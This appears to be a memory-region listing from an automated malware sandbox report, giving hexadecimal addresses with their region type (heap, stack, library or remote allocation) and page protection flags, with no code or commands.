4EB0000
heap
page read and write
6D3E000
stack
page read and write
18714025000
heap
page read and write
5DDD000
heap
page read and write
464F000
stack
page read and write
2DE0000
heap
page execute and read and write
1871226F000
heap
page read and write
5EDD000
heap
page read and write
548E000
stack
page read and write
1E29CD2A000
heap
page read and write
7E1E000
stack
page read and write
21942449000
trusted library allocation
page read and write
2132B934000
trusted library allocation
page read and write
18714CBA000
heap
page read and write
1E29CA1C000
heap
page read and write
5DB5000
heap
page read and write
55E2000
heap
page read and write
1E29CFD0000
heap
page read and write
1324000
trusted library allocation
page read and write
5E5C000
heap
page read and write
6DBE000
stack
page read and write
6C7B000
stack
page read and write
55CD000
heap
page read and write
4BEF000
heap
page read and write
1E29CD20000
heap
page read and write
4ADE000
stack
page read and write
1E29CDB6000
heap
page read and write
509E000
stack
page read and write
1E29D7B5000
heap
page read and write
7D3D000
stack
page read and write
5F66000
heap
page read and write
800000
heap
page read and write
2132B70A000
heap
page read and write
1871404E000
heap
page read and write
5DDD000
heap
page read and write
1E29ADA3000
heap
page read and write
18714348000
heap
page read and write
18714027000
heap
page read and write
570C000
trusted library allocation
page read and write
1E29CD3A000
heap
page read and write
B2697BF000
stack
page read and write
1E29AC30000
heap
page read and write
A241000
trusted library allocation
page read and write
2132B6E7000
heap
page read and write
18714321000
heap
page read and write
A0F0000
trusted library allocation
page read and write
48B7000
trusted library allocation
page read and write
5653000
heap
page read and write
1E29CA2E000
heap
page read and write
7F3E000
stack
page read and write
187121FB000
heap
page read and write
C30000
heap
page read and write
187122BE000
heap
page read and write
7290000
trusted library allocation
page read and write
5912000
trusted library allocation
page read and write
55AD000
heap
page read and write
2132B6F6000
heap
page read and write
55B6000
heap
page read and write
1F9EBFF000
stack
page read and write
1E29CDCF000
heap
page read and write
1E29CA47000
heap
page read and write
4C1B000
heap
page read and write
400000
remote allocation
page execute and read and write
18714030000
heap
page read and write
4BFB000
heap
page read and write
7100000
heap
page execute and read and write
1E29CD2E000
heap
page read and write
18714CBA000
heap
page read and write
1E29D5E1000
heap
page read and write
B4E000
stack
page read and write
1BB8CCD000
stack
page read and write
714E000
stack
page read and write
1E29C6B0000
heap
page read and write
49CE000
trusted library allocation
page read and write
187121FD000
heap
page read and write
571E000
trusted library allocation
page read and write
7013000
heap
page read and write
1E4017CE000
trusted library allocation
page read and write
123E000
heap
page read and write
5678000
heap
page read and write
7D90000
trusted library allocation
page execute and read and write
FC7000
trusted library allocation
page execute and read and write
6AE4AFF000
stack
page read and write
76A000
heap
page read and write
21940623000
trusted library allocation
page read and write
7C38000
heap
page read and write
6F7D000
heap
page read and write
18714328000
heap
page read and write
7F7E000
stack
page read and write
5DD8000
heap
page read and write
21942C49000
trusted library allocation
page read and write
18712288000
heap
page read and write
35E4000
heap
page read and write
4C01000
heap
page read and write
4E20000
heap
page read and write
2E60000
heap
page read and write
792000
heap
page read and write
766F000
stack
page read and write
E94000
trusted library allocation
page read and write
BC41000
trusted library allocation
page read and write
1E29CDCF000
heap
page read and write
33DA000
heap
page read and write
187122A6000
heap
page read and write
58A0000
heap
page read and write
18714610000
heap
page read and write
CA1000
heap
page read and write
18714CBA000
heap
page read and write
5DE2000
heap
page read and write
18714CBA000
heap
page read and write
2132B902000
trusted library allocation
page read and write
187142C5000
heap
page read and write
187142B3000
heap
page read and write
5913000
trusted library allocation
page read and write
4C22000
heap
page read and write
51C0000
heap
page execute and read and write
54F0000
heap
page execute and read and write
7F20000
trusted library allocation
page read and write
2D9F000
unkown
page read and write
1BB807F000
stack
page read and write
187142E6000
heap
page read and write
18714350000
heap
page read and write
1871404E000
heap
page read and write
5540000
heap
page execute and read and write
2194144D000
trusted library allocation
page read and write
18714348000
heap
page read and write
8930000
trusted library allocation
page execute and read and write
55A7000
heap
page read and write
18714CBA000
heap
page read and write
187145F0000
heap
page read and write
5599000
heap
page read and write
1F9EDFF000
stack
page read and write
1E29CA2E000
heap
page read and write
4BF4000
heap
page read and write
18714470000
heap
page read and write
1871402A000
heap
page read and write
187142D1000
heap
page read and write
1E29CA05000
heap
page read and write
52CF000
stack
page read and write
810000
heap
page read and write
7028000
heap
page read and write
1E29CA04000
heap
page read and write
500E000
stack
page read and write
1871404E000
heap
page read and write
2193E68B000
heap
page read and write
AC41000
trusted library allocation
page read and write
4C1E000
heap
page read and write
7ED0000
trusted library allocation
page read and write
28A0000
heap
page read and write
3D0000
heap
page read and write
D60000
heap
page read and write
2132B84E000
trusted library allocation
page read and write
5F6F000
heap
page read and write
568E000
heap
page read and write
364A000
heap
page read and write
590F000
stack
page read and write
1E29D768000
heap
page read and write
B269A7E000
stack
page read and write
7ACF000
stack
page read and write
55AE000
heap
page read and write
4C00000
heap
page read and write
1E29CA16000
heap
page read and write
7C7000
heap
page read and write
1871226F000
heap
page read and write
294F000
trusted library allocation
page read and write
1E29AD83000
heap
page read and write
B26AC4E000
stack
page read and write
49BB000
trusted library allocation
page read and write
18712282000
heap
page read and write
187122A6000
heap
page read and write
D50000
trusted library allocation
page read and write
289E000
stack
page read and write
18714C64000
heap
page read and write
18714024000
heap
page read and write
4BEF000
heap
page read and write
1E29CA2E000
heap
page read and write
1871403E000
heap
page read and write
1E29AD9E000
heap
page read and write
380000
heap
page read and write
18714048000
heap
page read and write
2EF1000
trusted library allocation
page read and write
7D50000
heap
page execute and read and write
55B6000
heap
page read and write
1871404E000
heap
page read and write
4E5C000
stack
page read and write
55E9000
heap
page read and write
70C0000
trusted library allocation
page read and write
1871404E000
heap
page read and write
1BB7A73000
stack
page read and write
133A000
trusted library allocation
page execute and read and write
1E29AD75000
heap
page read and write
187142EF000
heap
page read and write
1580000
heap
page read and write
219400C0000
trusted library allocation
page read and write
1E29CDC7000
heap
page read and write
36AD000
trusted library allocation
page execute and read and write
D90000
heap
page read and write
327C000
stack
page read and write
7EA0000
trusted library allocation
page read and write
6AE53FE000
stack
page read and write
55AA000
heap
page read and write
1E29CA2E000
heap
page read and write
5DB0000
heap
page read and write
1E29CA2E000
heap
page read and write
1360000
trusted library allocation
page read and write
4F9D000
stack
page read and write
1E29D7A8000
heap
page read and write
81D000
heap
page read and write
4C1E000
heap
page read and write
7D80000
heap
page read and write
21326B5A000
heap
page read and write
18714DBA000
heap
page read and write
2132B880000
trusted library allocation
page read and write
2810000
heap
page read and write
2132B896000
trusted library allocation
page read and write
5640000
heap
page read and write
70A0000
trusted library allocation
page read and write
18712246000
heap
page read and write
1E29CD98000
heap
page read and write
7E5D000
stack
page read and write
18712245000
heap
page read and write
B269D79000
stack
page read and write
1871432A000
heap
page read and write
7E60000
trusted library allocation
page read and write
6250000
heap
page read and write
1BB7FFD000
stack
page read and write
1E29CFE0000
heap
page read and write
624C000
stack
page read and write
1E29CD26000
heap
page read and write
1F9EAFF000
stack
page read and write
18714D03000
heap
page read and write
58A6000
trusted library allocation
page read and write
550E000
stack
page read and write
1871404E000
heap
page read and write
54CF000
stack
page read and write
1E29D6C1000
heap
page read and write
5652000
heap
page read and write
1E29CDB8000
heap
page read and write
18713CD0000
heap
page read and write
18714CCD000
heap
page read and write
1320000
trusted library allocation
page read and write
7FE6000
heap
page read and write
2193E820000
heap
page read and write
E84000
trusted library allocation
page read and write
A8B000
stack
page read and write
292E000
stack
page read and write
1871404E000
heap
page read and write
815000
heap
page read and write
1E29ADB2000
heap
page read and write
4E80000
trusted library allocation
page execute and read and write
18714CBA000
heap
page read and write
7B4000
heap
page read and write
6AE4BFF000
stack
page read and write
1BB8C4E000
stack
page read and write
1E29CA10000
heap
page read and write
4BE4000
heap
page read and write
1E29CCFA000
heap
page read and write
802000
heap
page read and write
1E29CDCF000
heap
page read and write
511E000
stack
page read and write
2920000
heap
page read and write
6AE52FE000
stack
page read and write
2194068B000
trusted library allocation
page read and write
7C31000
heap
page read and write
5652000
heap
page read and write
6F30000
heap
page read and write
1F9F3FE000
stack
page read and write
EB0000
heap
page read and write
4BE3000
heap
page read and write
1E402BCE000
trusted library allocation
page read and write
55A4000
heap
page read and write
29F0000
heap
page read and write
FBF000
stack
page read and write
2EFF000
trusted library allocation
page read and write
55F6000
heap
page read and write
4FC5000
trusted library allocation
page read and write
1210000
heap
page read and write
13D0000
heap
page read and write
21940600000
heap
page execute and read and write
4C00000
heap
page read and write
219404EE000
heap
page read and write
4650000
heap
page execute and read and write
7860000
heap
page read and write
2132B870000
trusted library allocation
page read and write
1E29CA0E000
heap
page read and write
356E000
heap
page read and write
1E29CA22000
heap
page read and write
2193E61F000
heap
page read and write
4E7E000
stack
page read and write
442E000
stack
page read and write
81D000
heap
page read and write
3CE000
stack
page read and write
7DDF000
stack
page read and write
2934000
trusted library allocation
page read and write
18714BEC000
heap
page read and write
1E29AD2C000
heap
page read and write
1E29ACF0000
heap
page read and write
5DDE000
heap
page read and write
728000
heap
page read and write
570F000
stack
page read and write
5580000
heap
page read and write
1E29D7C6000
heap
page read and write
4C1B000
heap
page read and write
187121EA000
heap
page read and write
4C01000
heap
page read and write
57CE000
trusted library allocation
page read and write
1BB7CFE000
stack
page read and write
7CD0000
trusted library allocation
page read and write
810000
heap
page read and write
33BE000
stack
page read and write
4BE6000
heap
page read and write
18712219000
heap
page read and write
5F21000
heap
page read and write
5850000
heap
page read and write
692D000
stack
page read and write
4BE3000
heap
page read and write
C8B000
heap
page read and write
72C0000
trusted library allocation
page read and write
2132B95A000
trusted library allocation
page read and write
2132B840000
trusted library allocation
page read and write
1E29CD35000
heap
page read and write
There are 1175 hidden memdumps, click here to show them.